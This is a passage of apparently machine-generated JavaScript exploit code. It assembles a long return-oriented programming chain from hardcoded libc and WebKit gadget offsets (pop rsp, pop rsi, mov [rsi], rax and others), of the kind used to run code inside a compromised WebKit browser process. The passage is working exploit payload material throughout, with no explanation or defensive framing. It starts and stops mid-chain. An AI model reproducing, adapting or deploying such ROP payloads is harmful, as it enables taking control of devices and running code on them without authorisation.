db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+465912, //L10009
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10009:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10011:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+466032, //L10014
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+466016, //L10012
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10012:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10014:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+466176, //L10017
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+466144, //L10015
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+466160, //L10016
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10015:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10016:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10017:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608, //pop rax
//L10019:
ropchain+466280, //L10018
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+782311, //pop rsp
ropchain+275424, //__ntoa_long
//L10018:
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967216, 4294967295]); // -0x50
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+466352, //L10020
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10020:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10022:
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+466432, //L10023
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10023:
db([0, 0]); // 0x0
//L9686:
//L9479:
set_gadgets([
libc_base+782311, //pop rsp
ropchain+488152, //L10025
//L9269:
libc_base+764760, //pop rsi
ropchain+466496, //L10026
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10026:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10028:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+466616, //L10031
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+466600, //L10029
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10029:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10031:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+466792, //L10034
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+466808, //L10035
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+466760, //L10032
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+466776, //L10033
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10032:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L10033:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10034:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10035:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+466904, //L10037
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+466888, //L10036
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L10036:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10037:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L10038:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L10039:
db([9, 0]); // 0x9
set_gadget(libc_base+763368,); //pop rcx
//L10040:
db([9, 0]); // 0x9
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+467104, //L10042
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10042:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+467160, //L10043
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10043:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+467296, //L10047
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+467280, //L10046
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10045:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L10046:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10047:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+467432, //L10050
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+467464, //L10052
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+467416, //L10049
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10049:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L10050:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10051:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10052:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+467576, //L10053+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+467568, //L10053
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L10053:
db([0, 0]); // 0x0
set_gadgets([
ropchain+467592, //L10053+24
ropchain+472112, //L10048
libc_base+764760, //pop rsi
ropchain+467632, //L10054
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10054:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10056:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+467752, //L10059
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+467736, //L10057
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10057:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10059:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+467928, //L10062
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+467944, //L10063
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+467896, //L10060
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+467912, //L10061
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10060:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L10061:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10062:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10063:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+468040, //L10065
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+468024, //L10064
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L10064:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10065:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+468120, //L10066
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10066:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10068:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+468240, //L10071
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+468224, //L10069
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10069:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10071:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+468416, //L10074
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+468432, //L10075
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+468384, //L10072
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+468400, //L10073
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10072:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L10073:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10074:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10075:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+468528, //L10077
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+468512, //L10076
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L10076:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10077:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+468608, //L10078
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10078:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10080:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+468728, //L10083
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+468712, //L10081
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10081:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10083:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+468904, //L10086
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+468920, //L10087
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+468872, //L10084
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+468888, //L10085
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10084:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L10085:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10086:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10087:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+469016, //L10089
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+469000, //L10088
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L10088:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10089:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+469096, //L10090
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10090:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10092:
db([4294967252, 4294967295]); // -0x2c
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+469216, //L10095
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+469200, //L10093
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10093:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10095:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+469392, //L10098
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+469408, //L10099
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+469360, //L10096
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+469376, //L10097
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10096:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L10097:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10098:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10099:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+469568, //L10103
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+469536, //L10101
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+469552, //L10102
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10100:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L10101:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10102:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10103:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+469672, //L10105
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+469656, //L10104
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10104:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10105:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L10106:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10107:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+469840, //L10108
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10108:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10110:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+469960, //L10113
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+469944, //L10111
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10111:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10113:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+470120, //L10117
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+470072, //L10114
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+470088, //L10115
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10114:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10115:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10116:
db([8, 0]); // 0x8
set_gadget(libc_base+759608,); //pop rax
//L10117:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+470176, //L10118
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10118:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10120:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+470296, //L10121
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+470312, //L10123
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10121:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10123:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+470456, //L10126
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+470424, //L10124
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+470440, //L10125
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10124:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10125:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10126:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+470536, //L10127
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10127:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10129:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+470656, //L10132
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+470640, //L10130
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10130:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10132:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+470800, //L10135
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+470768, //L10133
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+470784, //L10134
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10133:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10134:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10135:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+470880, //L10136
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10136:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10138:
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+471000, //L10141
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+470984, //L10139
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10139:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10141:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+471144, //L10144
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+471112, //L10142
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+471128, //L10143
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10142:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10143:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10144:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+471224, //L10145
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10145:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10147:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+471344, //L10150
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+471328, //L10148
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10148:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10150:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+471488, //L10153
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+471456, //L10151
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+471472, //L10152
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10151:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10152:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10153:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+471568, //L10154
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10154:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10156:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+471688, //L10159
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+471672, //L10157
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10157:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10159:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+471832, //L10162
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+471800, //L10160
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+471816, //L10161
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10160:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10161:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10162:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
